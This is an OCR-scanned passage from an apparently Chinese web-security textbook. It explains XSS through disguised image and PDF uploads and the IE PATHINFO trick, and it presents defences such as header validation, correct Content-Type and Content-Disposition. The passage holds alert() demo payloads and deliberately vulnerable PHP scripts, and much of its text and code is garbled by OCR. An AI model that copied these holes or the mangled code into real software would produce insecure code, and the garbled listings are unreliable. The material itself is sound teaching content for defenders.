文件 上 传 功能 、 下 载 功能 

影响 范围 

[于] 应 用 全 体 。 特 另 


0 影响 类 型 
伪装 


御 病 a 


用 户 参与 程度 
需要 一 点 击 链接 等 


e 正确 设置 文件 的 Content-Type 
。 确保 图 像 文件 的 扩展 名 与 内 容 ( 图 像 文件 头 ) 相符 
e 判定 为 用 于 下 载 的 文件 时 ， 在 响应 头 中 指定 Content-Disposition:attachment 

















> 
上 
间 
~ 


是 有 会 话 管理 或 认证 处 理 的 页 面 受 影响 最 大 













































































攻击 手段 与 影响 

接 下 来 就 让 我 们 首先 看 一 下 两 种 利用 文件 下 载 的 XSS 攻击 的 手段 。 这 里 介绍 的 攻击 方法 能 
在 Internet Explorer( IE ) 中 重 现 ， 而 使 用 IE 以 外 的 浏览 器 则 不 一 定 能 够 重 现 ， 但 由 于 IE 的 市 场 
份额 很 高 ， 而 且 使 用 此 处 介绍 的 方法 开发 的 应 用 也 同样 适用 于 其 他 浏览 器 ， 因 此 这 里 我 们 以 IE 
浏览 如 为 例 来 进行 讲述 。 




















令 图 像 文 件 引 起 的 XSS 

在 某 些 情况 下 ， 将 包含 HTML 或 JavaScript 代码 的 文件 伪装 成 图 像 文 件 上 传 ， 就 可 能 会 形成 
跨 站 脚本 (XSS ) 攻击 。 而 且 通 过 下 面 展 示 的 例子 也 可 以 看 到 ， 即 使 已 经 实施 了 相应 的 对 策 来 防 
止 用 户 上 传 的 脚本 在 服务 器 端 被 执行 ， 在 下 载 文件 的 时 候 还 是 有 可 能 会 遭受 跨 站 脚本 攻击 。 

虽然 IE8 及 以 后 的 版 本 中 已 经 对 利用 图 像 的 XSS 攻击 进行 了 防范 ， 但 考虑 到 IE7 及 之 前 的 
版 本 还 有 一 定数 量 的 用 户 ， 因 此 在 应 用 中 采取 防范 措施 还 是 很 有 必要 的 。 

在 试验 环境 中 打开 http://example.jp/4c/4c-001a.php， 或 者 在 http://example.jp/4c/ 的 菜单 中 点 
击 “2. 4c-001a: 文件 上 传 (经 过 下 载 脚本 )” 链 接 ,， 该 上 传 页 面 已 经 实施 过 针对 执行 脚本 的 防范 
对 策 。 

由 于 页 面 上 会 要 求 输入 文件 名 ， 因 此 这 里 我 们 新 建 以 下 文本 文件 并 将 文件 命名 为 4c-901.png 
后 保存 ， 然 后 再 在 页 面 上 指定 此 文件 名 。 
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代码 清单 ”4c-901.png 





<script>alert ('XSS') ;</script> 














完成 上 传 后 ， 页 面 显示 如 下 。 由 于 4c-901.png 并 非 标准 的 图 像 文件 ， 因 此 页 面 上 显示 了 一 个 
红 又 的 记号 。 


4-108 ”上传 了 伪装 成 图 像 的 文件 


























p/n Wi ETEEE 
ER 加 http//examplejp/4c/4c-002a.php -| ?| xj 可 are rr 
次 收 基 夫 ”| 息 httpi//examplejp/4c/4c-002a.php | IRO) ~ 
4c-901.png 已 上 传 完毕 
回 日 

















这 时 ， 点 击 4c-901.png 链接 ， 先 前 的 伪装 图 像 就 会 直接 显示 出 来 。 如 下 图 所 示 ，IE7 执行 
JavaScript 代码 ， 而 IE8 则 只 显示 了 文本 信息 。 


4-109 在 IE7 及 之 前 的 版 本 中 XSS 攻击 成 功 


E7 中 的 显示 IE8 中 的 显示 
[ 穆 httpy/examplejp/4c/4c-003.phpzfle=24.| 加 | % 


OO [a htp/examplejp! -[3|x |[G ng 


<script>alert( XSS'"):</script> 














YY 

















「 惩 http://example.jp/4c/4c-003.php?file=247...| E 号 


OO - | 目 htpy/eag 


帘 实 le http://exal 

























Windows Internet Expl... 














企 xss 





























Le -| 


在 实际 发 动 攻击 时 ， 攻 击 者 上 传 包含 恶意 JavaScript 代码 的 图 像 文 件 以 后 ， 还 会 将 显示 此 图 
像 的 URL 添加 到 恶意 网 站 中 。 然 而 ， 由 于 使 用 imsg 元 素 显 示 图 像 时 JavaScript 0 
此 攻击 者 通常 利用 iframe 等 元 素来 让 它 以 HTML 的 形式 显示 。 

而 JavaScript 被 执行 后 ， 网 站 的 HTTP 消息 就 如 下 图 的 Fiddler 界面 所 示 。 
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4-110 被 执行 JavaScript 的 网 站 的 HTTP 消息 


i Fiddler - HTTP Debugging Proxy eke 
Eile Edit Rules Tools View Help 


Wy Comment #7 Reissue X Remove » hb Resume All | 时 Sted | process Fiter 鹏 Find 罗 5ave | 看 Launch IE 人 dlear Cache 


En Sen < || © statistics ET Inspectors | £ AutoResponder | 6 Request Buider | tog | Fiters | = Tmeine 
A |e best ERE Headers | Textyiew | WebForms | Hexview | Auth |[Raw | xML | 
国 ! 200 HTTP ~ exampleip j4cj4c-001a,php - TREE = 去 
国 :z 2z200 HTTP example,jp /4c/4c-002a,php ACCept: */* 


/ 
0 a 名 4cj4c-00 机 IReferer: http://example. ip/4c/4c-002a. php 
PE Pup IAccept-Language: ja 
UA-CPU: x86 
|Accept-Encoding: gzip, defla 
1 "NET CLR 





















































User-Agent: Mozilla/4.0 vi ble MSIE 7.0; Windows NT 6.0; GTB6.5; SLCC1; 
Connection: Keep-Alive 

Host: example. jp 

ICookie: PHPSESSID=a1j25sq4rscsc94jmtmolocml0 





4 Ms 上 




















Transformer Headers | TextView Imagewiew | HexView | ‘WebView | Auth Caching Privacy Raw 


xML | 





























: -Aliw 
content-Type: image/png 一 
<script>alert('Xss');</script> 
4 TT 上 
FEED | 
入 capturng “三 AlProcesses 113 http:j/example,jpj4c!4c-003,php?file=2295alcd,png 











可 以 看 出 HTTP 响应 中 的 Content-Type 消息 头 准确 无 误 地 指定 为 了 image/png。 然 而 IE7 却 
对 此 视而不见 ， 仍 然 将 该 响应 判断 为 HTML 类 型 ， 从 而 也 就 导致 JavaScript 被 执行 。 

利用 图 像 文件 的 XSS 所 造成 的 影响 与 4.3 节 介 绍 的 普通 的 XSS 相同 ， 即 Cookie 被 窃取 而 造 
成 伪装 攻击 、Web 功能 被 恶意 使 用 、 页 面 被 算 改 进而 导致 钓鱼 攻击 等 。 




















人 PDF 下 载 引 起 的 XSS 
除了 图 像 服务 网 站 之 外 ， 下 面 我 们 再 来 看 一 个 提供 PDF 等 应 用 文件 下 载 服务 的 网 站 案例 。 
这 里 的 示例 网 站 也 就 相当 于 存储 服务 网 站 的 简略 版 。 


示例 脚本 解说 

首先 我 们 来 看 一 下 示例 脚本 。 该 试验 中 的 文件 上 传 页 面 (4c-011.php ) 基本 上 直接 沿用 了 
4c-001.php， 只 是 将 action 的 目标 改 为 了 4c-012.php。 

同样 ， 在 接收 上 传 文件 的 页 面 (4c-012.php ) 和 下 载 脚本 (4c-013.php ) 中 ， 将 接收 文件 的 类 
型 更 改 为 了 PDF。 


代码 清单 ”/4c/4c-012.php ( 开头 和 末尾 ) 





<?php 
define('UPLOADPATH', '/var/upload'); 


function get upload file name(Stofile) { 
// 校 验 扩展 名 
$info = pathinfo(s$tofile); 
Sext = strtolower ($info['extension']); // 扩展 名 ( 统一 为 小 写字 母 ) 
了 Se l= GE 4 
die(' 只 能 上 传 扩 展 名 为 pdf 的 文件 ') 
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} 








// ... 中 上 略 

$imgurl = '4c-013.php?file=' . basename ($tofile); 

?3 

<body> 

<a href="<?php echo htmlspecialchars ($imgurl); ?>"><?php 
echo htmlspecialchars ($orgfile, ENT NOQUOTES, 'UTF-8'); ?> 
已 上 传 </a><br> 

</body> 














下 面 是 下 载 脚本 的 源码 。 阴 影 部 分 为 与 4c-003.php 的 不 同 之 处 。 


代码 清单 ”/4c/4c-013.php 





<?php 
define('UPLOADPATH', '/var/upload'); 
smimesm= array Ma le on 

















$file = $§ GETI['file']; 

$info = pathinfo(s$file); // 取得 文件 信息 

$ext = strtolower ($info['extension']); // 扩展 名 ( 统一 为 小 写字 母 ) 
$content type = $mimes [$ext]; // 取得 Content -Type 

if (! $content type) { 





die(' 只 能 上 传 扩 展 名 为 pdf 的 文件 ') ; 
} 


header('Content=Type: 1 , $content type); 
readfile(UPLOADPATH . '/' . basename ($file)); 
全 冯 














首先 看 到 的 是 正常 情况 下 的 页 面 跳 转 。 在 页 面 4c-011.php 上 指定 恰当 的 PDF 文件 后 点 击 上 
传 按 钮 ， 页 面 显示 如 下 。 


4-111 上 传 PDF 文件 后 的 页 面 


| 
把 httpW/examplejp/4c/4c-012.php - Windows Internet Explorer ls| 




















OO [Bttp//examplejp/sc/se-012php » [5 |X || sing Pp- 
次 疏 芒 夫 。 | 同 htpy/examplejp/4c/4c-012.php | 工具 (O) ~ 
hello pdf 已 上 : i 














|e | 


这 时 点 击 下 载 链 接 就 能 下 载 PDF 文件 ， 页 面 显 示 如 下 图 所 示 。 
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4-112 点 击 链接 后 下 载 PDF 
[ 条 httpy/examplejp/4c/4c-012.php - Windows Internet Explorer 己 | 可 | 又 站 
文件 下 载 








您 想 打 开 或 保存 此 文件 吗 ? 





名 称 : 4c-013,php 
[a 类 型 ，HTML 文档 , 23.1KB 
来 源 : examplejp 








打开 (0)。 | (保存 G) | (= 取消 

















© 二 得 乔 各 二 


























令 将 HTML 文件 伪装 成 PDF 而 引起 的 XSS 


下 面 我 们 就 不 再 使 用 正常 的 PDF 文件 ， 而 是 将 仅 包含 script 元 素 的 HTML 文件 命名 为 
4c-902.pdf 后 保存 ， 然 后 再 通过 刚才 的 脚本 ( 4c-011.php ) 将 其 上 传 。 


代码 清单 ”4c-902.pdf 











<script>alert ('XSS') ;</Script> 








上 传 此 伪装 PDF 文件 后 ， 页 面 显 示 如 下 图 所 示 。 这 时 点 击 “4c-902.pdf 上 传 完毕 ”链接 就 会 
出 现下 载 文 件 的 对 话 框 


而 以 下 就 是 攻击 者 生成 恶意 链接 的 手段 。 右 击 下 载 使 用 的 链接 ， 选 择 菜 单 中 的 “复制 快捷 
方式 ”。 


Ht 











EV 








图 4-113 选择 菜单 中 的 “复制 快捷 方式 ” 





mii 
息 htpy/example 记 是 入 (A 


GO"la Hm 
次 收 夫 | 息 H| 。 训 
es 


4c-902 ye 和 ) 
秆 贴 ([p) 


起 使 用 Bing 一 泽 
各 使 用 Windows Live 发 闫 电子 邮件 
最 使 用 Windows Live 所 所 博客 

所 有 加 速 器 























接 下 来 ， 将 快捷 方式 (URL ) 粘贴 在 浏览 锅 的 地 址 栏 上 。 这 时 理论 上 应 该 会 出 现 类 似 于 下 面 


的 URL, 但 由 于 file= 后面 的 文件 名 是 随机 生成 的 ， 因 此 在 读者 的 环境 中 应 该 会 显示 为 其 他 字 
符 串 。 





http://example.jp/4c/4c-013.php?file=laf12536.pdf 
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此 时 ， 将 字符 串 /a.html 插 入 到 URL 中， 如 下 面 的 阴影 部 分 所 示 。 插 入 的 字符 串 被 称 为 
PATHINFO， 这 是 以 貌似 文件 名 的 形式 将 参数 添加 到 URL 中 的 方法 。 由 于 文件 a.html 实际 上 并 
不 存在 ， 因 此 该 字符 串 会 被 作为 参数 传递 给 4c-013.php 脚本 。 

















http://example.jp/4c/4c-013.php/a.htm]l?file=1laf12536.pdf 








如 果 这 时 按 下 回 车 键 ， 如 下 图 所 示 ，JavaScript 就 会 被 执行 。 与 伪装 图 像 的 情况 不 同 ，IE7 和 
IE8 中 都 执行 了 JavaScript 代码 。 


4-114 XSS 攻击 成 功 


E7 中 的 显示 IE8 中 的 显示 
「 @ htp://examplejp/4c/4ac-013.php/a.htmlzf..[ 握 | 回 | 器 | [httpy//examplejp/4c/4c-013.phpfile=,.[ | 加 | 33 

























Windows Internet Expl... We. Si 











企 xss 















































由 此 可 见 , 将 HIML (JavaScript ) 文件 伪装 成 PDF 并 上 传 后 ， 只 要 在 调用 该 文件 的 URL 中 
添加 PATHINFO， 就 能 使 得 攻击 对 象 网 站 执行 JavaScript。 





人 漏洞 的 根本 原因 是 Content-Type 不 正确 

伪装 PDF 之 所 以 会 引起 XSS 漏洞 ， 其 根本 原因 在 于 Content-Type 有 误 。PDF 正确 的 
Content-Type 为 application/pdf， 而 如 果 Content-Type 被 错误 地 设置 为 了 application/x-pdf ， 就 会 
直接 导致 漏洞 的 产生 。 








安全 隐患 的 产生 原因 


文件 下 载 之 所 以 会 引起 XSS 是 因为 受到 了 Internet Explorer 特性 的 影响 。Internet Explorer 中 
判断 文件 类 型 时 ， 除 了 基于 HTTP 响应 的 Content-Type 消息 头 以 外 ， 还 会 参考 URL 中 的 扩展 名 











和 文件 的 内 部 数据 。 虽 然 具 体 的 判断 方法 并 没有 对 外 公开 ,但 目前 能 够 得 知 的 内 部 行为 如 下 。 
多 内 容 为 图 像 时 


文件 内 容 为 图 像 的 情况 下 ，IE 判断 文件 类 型 时 除了 基于 响应 头 中 的 Content-Type， 还 会 用 
到 图 像 文件 的 文件 头 。 图 像 文件 头 是 指 位 于 文件 开头 的 固定 字符 串 ， 一 般 被 用 来 识别 文件 类 型 。 
GIFE、JPEG7T、PNG 的 文件 头 如 下 表 所 示 。 














中 JPEG 本 来 是 图 像 压 缩 方法 的 名 称 ， 作 为 文件 格式 时 的 术语 应 该 为 ]FIF， 然 而 由 于 JPEG 也 普遍 被 用 来 指 代 JEFIF 文件 
格式 ， 因 此 本 书 也 采用 JPEG 这 个 称呼 。 
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表 4-20 图像 文 件 的 文件 头 














图 像 格式 文件 头 
GIF GIF87a 或 GIF89a 
JPEG \xFF\xD8\WxFF 
PNG \x89PNGWx0D\Wx0AWx1AWXx0A 











Internet Explorer (7 及 以 前 版 本 ) 中 默认 按照 以 下 方法 判断 文件 类 型 。 


CO Content-Type 和 文件 头 一 致 时 
这 时 采用 Content-Type 所 示 的 文件 类 型 。 


人 Content-Type 和 文件 头 不 一 致 时 

Content-Type 和 文件 涉 不 一 致 时 ， 两 者 都 会 被 浏览 器 忽略 。 这 时 浏览 器 会 根据 文件 的 内 容 来 
推测 文件 类 型 。 如 果 文 件 中 包含 HTML 标签 , 该 文件 就 可 能 会 被 判定 为 HTML 文件 了 。 在 “图 像 
文件 引起 的 XSS” 这 一 小 节 中 介绍 的 伪装 PNG 文件 就 属于 这 类 情况 。 该 示例 文件 中 虽然 没有 包 
含 图 像 文件 头 ， 但 根据 笔者 的 试验 ， 即 使 添加 了 图 像 文件 头 ， 如 果 与 Content-Type 荫 盾 也 会 被 浏 
览 器 无 视 ?。 


人 内容 不 为 图 像 时 

图 像 文件 以 外 的 情况 下 ,各 IE 版 本 都 做 如 下 处 理 。 首 先 ， 根 据 浏 览 器 是否 能 够 处 理 接 收 到 
的 Content-Type， 正 的 举动 会 有 所 不 同 。 

如 果 下 能够 处 理 收 到 的 Content-Type， 就 会 按照 Content-Type 来 处 理 。 注 册 表 HKEY 
CLASSES_ROOTAMIME\Database\Content Type 中 保留 了 下 能 够 处 理 的 所 有 Content-Type。 
图 4-115 中 列 出 了 其 中 的 一 部 分 。 如 图 所 示 ，PDF 的 Content-Type 为 application/pdf， 而 非 
application/x-pdf。 




















@ 在 以 前 (IE7 为 止 ) 的 版 本 中 ， 当 文件 满足 上 述 条 件 时 会 被 判定 为 HTML 文件 ， 而 从 IE8 开始 ， 满 足 上 述 同 等 条 件 的 
文件 则 会 被 视 为 文本 文件 ( text/plain )。 
@ ”详情 请 参考 笔者 的 博客 文章 《图 像 文件 引起 跨 站 脚本 ( XSS ) 的 倾向 与 对 策 )[2]。 
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4-115 IE 能 够 处 理 的 Content-Type 














| 民生 [ensue 
文件 (编辑 (E) 剖 看 (V) 收藏 夫 (A) ”帮助 (H) 
4 出 MIME “|| 名 称 半 型 数据 
4 县 Database a8] RRA) REG_SZ ( 数 信 未 设 置 ) 


”时 Charset cLsID REG_SZ {05563215-225C-45EB-BB34-AFA47217B1DE} 

-二 Codepage 鸭 Exioniion REG_SZ Buf 

4 B Content Type 
Bh application 





7-5i 


加 9 F 
计算 机 \HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/pdf 
上 


如 果 收 到 的 Content-Type 不 是 IE 能 够 处 理 的 类 型 ， 那 么 IE 就 会 根据 URL 中 的 扩展 名 进行 
判断 。 判 断 规 则 的 详情 非常 复杂 ， 有 兴趣 的 读者 可 以 参考 长 谷川 阳 介 的 文章 《无 法 忽视 : IE 中 
对 Content-Type 的 忽视 [1]。 在 上 面 介 绍 的 “将 HTML 文件 伪装 成 PDF 而 引起 的 XSS” 这 一 小 
节 中 ， 生 成 用 来 攻击 的 URL 时 添加 了 作为 PATHINFO 的 /a.html， 这 就 是 恶意 利用 了 IE 会 通过 
URL 中 的 扩展 名 来 判断 文件 类 型 的 特性 。 















































对 策 

应 对 文件 下 载 所 引起 的 XSS 漏洞 的 方法 可 分 为 上 传 时 的 对 策 和 下 载 时 的 对 策 ， 分 别 如 下 。 
令 文件 上 传 时 的 对 策 

上 传 文件 时 实施 以 下 操作 。 


校 验 扩展 名 是 否 在 允许 范围 内 
图 像 文件 的 情况 下 确认 其 文件 头 


关于 校 验 扩展 名 ，4.12.2 节 的 对 策 已 经 详 述 过 。PHP 可 以 使 用 get imagesize 国 数 来 确认 
图 像 的 文件 头 。 


格式 清单 ”getimagesize 函数 











array 9etimagesize (String $filename [, array &$imageinfo]) 


该 函数 将 接收 到 的 图 像 文 件 的 文件 名 作为 参数 ， 并 以 数组 的 形式 返回 图 像 的 长 宽 尺 寸 和 图 像 
格式 等 信息 。 下 面 是 一 些 常见 的 图 像 格 式 所 对 应 的 整数 值 和 常量 。 详 情 请 参考 PHP 的 文档 “。 








© http:/www.php.net/manual/zh/function.getimagesize.php 
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表 4-21 getimagesize 函数 返回 的 图 像 格式 信息 
击 

















值 量 
1 IMAGETYPE_GIF 
IMAGETYPE_JPEG 
3 IMAGETYPE_PNG 





在 之 前 的 介绍 中 ,我 们 已 经 了 解 到 图 像 上 传 脚本 的 改良 版 4c-002a.php 中 存在 XSS 漏洞 。 而 
使 用 getimagesize 函数 就 可 以 消除 XSS 漏洞 。 假 设 改良 后 的 脚本 名 为 4c-002b.php。 检 验 图 
像 文件 的 函数 check image_type 的 定义 如 下 。 


代码 清单 ”/4c/4c-002b ( check_image_type 函数 的 定义 ) 





// function check image type ($imgfile, S$tofile) 
// $imgfile : 校 验 对 象 的 图 像 文件 名 
// S$tofile : 文件 名 ( 用 于 校 验 扩 展 名 ) 
function check _ image type($imgfile，Stofile) { 
// 取得 并 校 验 扩展 名 
$info = Pathinfo(S$ofile) ; 
Sext = Strtolower(Sinfo ['extension']); // 扩展 名 ( 统一 为 小 写字 母 ) 
if ($ext != 'png' && Sext != 'jpg' && Sext != 'gif') { 
die(' 只 能 上 传 扩展 名 为 gif、jpg 或 png 的 图 像 文件 '); 
} 
// 取得 图 像 类 开 
simginfo = getimagesize ($imgfile); // 取得 图 像 信息 的 数组 
$type = $imginfo[2]; // 取出 图 像 类 型 
// 下 面 ， 如 果 是 正常 的 组 合 就 return 






































































































































if ($ext == 'gif' && $type == IMAGETYPE GIF) 
return true; 

if ($ext == 'jpg' && $type == IMAGETYPE JPEG) 
return true; 

if ($ext == 'png' && $type == IMAGETYPE PNG) 





return true; 
// 如 果 到 最 后 都 没有 return 就 报错 
die(' 扩展 名 和 图 像 类 型 不 一 致 ' ) ; 


























下 面 为 调用 上 述 check_image_type 函数 的 部 分 。 阴 影 部 分 即 为 添加 的 代码 行 。 


代码 清单 ”/4c/4c-002b.php 





$stmpfile = $ FILES["imgfile"] ["tmp name"]; 
Sorgfile = $ FILES["imgfile"] ["name"]; 
if (! is uploaded file(Stmpfile)) { 
die(' 文件 没有 上 传 ') ; 
} 
// 校 验 图 像 
ehneernimageatypel(S toe inle Scale 

















$tofile = get upload file name($orgfile); 
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专栏 : BMP 格式 的 注意 点 与 MS07-057 COLUMN 


本 书 中 介绍 了 浏览 器 涉及 的 3 种 图 像 格 式 ， 即 GIF、JPEG 与 PNG， 而 有 的 浏览 器 也 可 以 处 
理 其 他 格式 的 图 像 文件 。 像 Windows 中 的 标准 格式 BMP 也 能 够 在 主流 的 浏览 器 中 显示 。 那 么 ， 
遇 到 BMP 格式 时 该 如 何 处 理 呢 ? 
其 实 上 面 介 绍 的 方法 并 不 能 完美 地 处 理 BMP 格式 的 图 像 。BMP 格式 的 图 像 文件 头 为 BM， 
但 处 理 BMP 图 像 时 ， 即 使 Content-Type 与 文件 头 一 致 ，IE 6 和 |E 7 中 也 有 可 能 将 其 识别 为 
HTML 从 而 导致 JavaScript 被 执行 。 

PNG 格式 也 曾经 发 生 过 与 BMP 相同 的 现象 ， 但 这 个 问题 已 经 由 MS07-057 安全 更 新 补丁 
( 2007 年 10 月 ) 所 修复 。 由 此 可 见 ， 提 醒 用 户 安 装 最 新 的 安全 更 新 补丁 是 非常 重要 的 。 

另外 ， 从 实用 性 的 角度 来 看 ， 由 于 BMP 很 不 适合 压缩 ( 只 能 使 用 单纯 的 压缩 方式 )， 并 
BMP 仅 限 于 Windows 使 用 ， 因 此 我 们 并 没有 必要 非 在 互联 网 上 使 用 BMP 格式 的 文件 。 而 需要 
使 用 BMP 时 也 都 可 以 用 PNG 格式 来 代替 。 

综 上 所 述 ， 这 里 不 推荐 大 家 在 Web 上 使 用 BMP 格式 的 文件 
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文件 下 载 时 的 对 策 
下 载 文件 时 的 对 策 如 下 。 
正确 设置 Content-Type 
图 像 文件 的 情况 下 确认 其 文件 头 
必要 时 设置 Content-Disposition 消息 头 











仿 正 确 设 置 Content-Type 

在 PDF 文件 下 载 所 引起 的 XSS 漏洞 示例 中 ， 漏 洞 产 生 的 主要 原因 均 为 Content-Type 设置 有 
误 。 因 此 ， 只 要 将 PDF 格式 的 Content-Type 正确 设置 为 application/pdf， 就 能 够 消除 漏洞 。 而 且 
除 正之 外 ， 正 确 指 定 Content-Type 这 一 对 策 也 适用 于 其 他 所 有 的 浏览 器 。 

如 果 下 载 时 不 经 过 下 载 脚本 而 是 将 文件 保存 在 公开 目录 中 的 话 ， 就 一 定 要 确认 Web 服务 器 
的 设置 是 否 有 误 。Apache 中 ，Content-Type 的 设置 被 保存 在 了 名 为 mime.types 的 配置 文件 中 。 
PDF 等 常见 的 软件 一 般 不 会 有 问题 ， 而 如 果 用 到 了 很 生僻 的 软件 或 自己 设置 mime.types 时 ， 请 
务必 确保 浏览 需 能 够 识别 该 Content-Type。 











人 图像 文件 的 情况 下 确认 其 文件 头 
通过 下 载 脚本 来 下 载 图 像 文件 时 ， 只 要 在 下 载 时 确认 了 文件 头 ， 即 使 由 于 某 些 原 因 Web 服 
务 器 中 混和 人 了 看 法 的 图 像 文件 ， 也 不 会 影响 到 应 用 程序 。 

下 面 是 实施 了 检验 文件 头 对 策 的 改 恨 版 的 下 载 脚本 (摘要 )。 阴 影 部 分 中 调用 了 检验 文件 头 
的 函数 check image type。 
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代码 清单 ”/4c/4c-003b.php 





<?php 

define('UPLOADPATH', '/var/upload'); 

// function check image type ($imgfile, S$tofile) 

// $imgfile : 校 验 对 象 的 图 像 文件 名 

// S$tofile : 文件 名 ( 用 于 校 验 扩展 名 ) 

function check image _ type($imgfile，S$tofile) { /* 省 略 */ } 









































Smimes = array('jpg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 





























'image/gif'); 

$file = $ GETI['file']; 

sinfo = pathinfo(s$file); // 取得 图 像 类 型 

Sext = strtolower ($info['extension']); // 扩展 名 ( 统一 为 小 写字 母 ) 
$content _ type = $mimes [$ext]; // 取得 Content -Type 

if (! $content type) { 








daie(' 只 能 上 传 扩展 名 为 gif、jpg 或 png 的 图 像 文件 ' ) ; 
} 











$path = UPLOADPATH . '/' . basename ($file); 
ehecknimage type(spath spath 
header('Content-Type: ' . $content type); 
readfile ($path); 

Fw 











今 必要 时 设置 Content-Disposition 消息 头 


当下 载 的 文件 并 不 需要 使 用 应 用 程序 打开 ， 而 是 只 要 求 能 够 下 载 就 行 的 情况 下 ， 可 以 在 响应 
消息 头 中 指定 Content-Disposition: attachment。 这 时 ， 如 果 将 Content-Type 设 为 application/octet- 














stream， 文 件 类 型 就 变 成 了 “用 于 下 载 的 文件 "。 下 面 为 消息 头 的 设置 示例 。 








Content-Type: application/octet-stream 
Content-Disposition: attachment; filename="hogehoge.pdf" 














这 里 ，Content-Diaposition 消息 头 的 选项 属性 flename 被 用 于 指定 保存 文件 时 的 默认 文件 名 。 


多 其 他 对 策 








以 上 介绍 的 XSS 对 策 是 为 了 防范 漏洞 所 需要 进行 的 最 低 限度 的 校 验 处 悍 




















像 文件 头 并 无 法 确认 是 否 真 的 能 在 用 户 的 浏览 右上 显示 。 
因此 在 决定 Web 应 用 的 详细 规格 时 ， 还 应 当 探 讨 是 否 要 执行 以 下 校 验 。 


除了 图 像 文 件 的 大 小 之 外 还 校 验 尺寸 和 色 数 等 
校 验 文件 是 否 能 作为 图 像 文件 读 取 
扫描 病毒 ( 详情 见 7.4 节 ) 
校 验 文件 内 容 ( 自动 或 手动 ) 
成 人 内 容 











E。 例如， 仅 校 验 图 
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侵犯 版 权 的 内 容 
违反 法 律 或 妨害 公共 秩序 的 内 容 
其 他 


专栏 : 将 图 像 托管 在 其 他 域名 
2009 年 左右 ， 有 些 网 站 开始 将 图 像 托管 在 主 服务 域名 之 外 的 单独 域名 上 。 下 面 列举 的 就 是 

























































































些 将 图 像 托管 在 其 他 域名 的 网 站 。 
表 4-22 将 图 像 托管 在 其 他 域名 的 网 站 案例 
网 站 名 主 域名 图 像 使 用 的 域名 

Yahoo ! JAPAN yahoo.co.jp yimg.jp 
YouTube youtube.com ytimg.com 
niconico 动画 nicovideo.jp nimg.jp 
Twitter twitter.com twimg.com 
Amazon.co.jp amazon.co.jp images-amazon.com 
































UU 




















上 面 这 些 都 是 高 流量 的 网 站 ， 虽 然 将 图 像 使 用 的 域名 分 离 出 来 多 是 为 了 使 网 站 的 响应 速度 姑 
快 ， 但 另 一 方面 ， 这 一 操作 也 具有 提升 网 站 安全 性 的 效果 。 

这 是 因为 ， 将 用 户 上 传 的 图 像 或 PDF 等 文件 保存 在 其 他 域名 后 ， 即 使 图 像 文件 造成 的 XSS 
攻击 取得 成 功 ， 也 不 会 波及 主 服务 
下 载 时 的 XSS 基本 上 属于 浏 览 器 的 问题 ， 由 于 这 一 问题 在 市 场 份额 很 高 的 IE 中 非常 常见 ， 
而 且 至 今 尚未 得 到 完全 修复 。 因 此 ,作为 辅助 性 对 策 ,最 好 考虑 一 下 将 图 像 存 储 在 其 他 域名 的 方法 。 











































































































口 










































































参考 : 用 户 PC 中 没有 安装 对 应 的 应 用 程序 时 
如 果 用 户 的 PC 中 没有 安装 Content-Type 所 对 应 的 应 用 程序 ， 该 Content-Type 就 会 被 浏览 吉 
视 为 “未 知 "， 从 而 就 可 能 会 造成 XSS。 
要 处 理 此 问题 并 不 容易 。 但 通过 采取 以 下 措施 即 可 进行 有 效 的 防范 。 
托管 文件 的 服务 右 使 用 其 他 域名 
添加 Content-Disposition 消息 头 
然而 ， 由 于 上 述 方法 会 产生 副作用 ， 因 此 建议 采取 以 下 方法 ， 虽 然 可 靠 性 略 逊 一 筹 但 能 保证 
没有 副作用 。 
校 验 URL 是 和 否 与 应 用 中 预想 的 一 臻 
通知 用 户 安 装 浏览 文件 所 需 的 应 用 程序 
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总 结 





本 节 讲 述 了 图 像 的 上 传 与 下 载 处 理 所 引 起 的 安全 隐患 。 虽 然 上 传 处 理 造 成 的 安全 隐患 一 直 以 














来 都 没有 受到 太 大 关注 , 但 是 ， 鉴 于 漏洞 造成 的 影响 较 大 ， 并 且 可 照相 手机 的 高 速 普 及 造成 了 照 
片 分 享 网 站 的 增加 ， 此 外 存储 服务 网 站 也 在 快速 增长 ， 因 此 想必 今后 会 有 越 来 越 多 的 Web 应 用 


需要 警惕 这 个 安全 隐患 。 
文件 上 传 与 下 载 问题 的 基本 对 策 为 正确 设置 Content-Type 和 扩展 名 。 





图 像 文 件 的 情况 下 ， 校 


验 文件 头 是 最 起 码 的 操作 ， 此 外 ， 根 据 需要 还 应 当 校 验 图 像 文件 的 有 效 性 。 
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4.13 ”include 相关 的 问题 


本 闻 将 讲述 由 能 够 使 部 分 脚本 从 外 界 读 和 人 的 include 机 制 所 引发 的 安全 隐患 。 





aIS HI 


概要 
PHP 等 脚本 语言 能 够 从 外 部 文件 读 取 脚本 源 代码 的 一 部 分 。PHP 中 对 应 的 函数 有 require、 


require once、 include、 include once,。 
如 果 外 界 能 够 指定 inclugde 的 对 象 文件 名 ， 就 可 能 会 发 生意 料 之 外 的 文件 被 include 而 
遭 到 攻击 。 这 被 称 为 文件 包含 漏洞 "。 某 些 情 况 下 ，PHP 中 还 可 以 通过 配置 来 指定 外 部 服务 器 的 
URL 作为 文件 名 ,这 就 被 称 为 远程 文件 包含 (RFI )。 
文件 包含 攻击 的 影响 如 下 。 


Web 服务 需 的 文件 被 外 界 浏览 而 导致 信息 


时 4 


脚本 被 任意 执行 所 造成 的 影响 。 典 型 的 影响 a 
筑 改 网 站 
执行 非法 操作 
攻击 其 他 网 站 ( 执 脚 石 ) 
为 了 防范 文件 包含 漏洞 ， 建 议 实施 以 下 任意 一 项 对 策 。 
避免 include 的 路 径 名 中 包含 外 界 传人 的 参数 
include 的 路 径 名 中 包含 外 界 传 入 的 参数 时 ， 限 制 其 














字符 种 类 仅 为 字母 和 数字 


文件 包含 漏洞 总 览 











2 产生 地 点 
通过 include 等 函数 读 取 脚本 的 页 面 


-至 影响 范围 


本 所 有 页 面 





























中 本 书 对 安全 隐患 的 命名 参考 了 CWE-98 中 的 记述 (http:Wcwe.mitre.org/data/definitions/98.html2010 年 12 月 19 日 ) 
关于 CWE (Common Weakness Enumeration， 统 一 的 软件 漏洞 一 览 定义 工程 ) 的 说 明 ， 请 参考 http://www.ipa.go.jp/ 


security/vuln/CWE.html (日 文 ), 
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> 影响 类 型 
信息 泄漏 、 自 改 网 站 、 执 行 非法 操作 、 攻 击 其 他 网 站 ( 执 脚 石 ) 
GS 影响 程度 


Y 用 户 参与 程度 
不 需要 


对 策 概 要 
执行 以 下 任 一 方法 。 

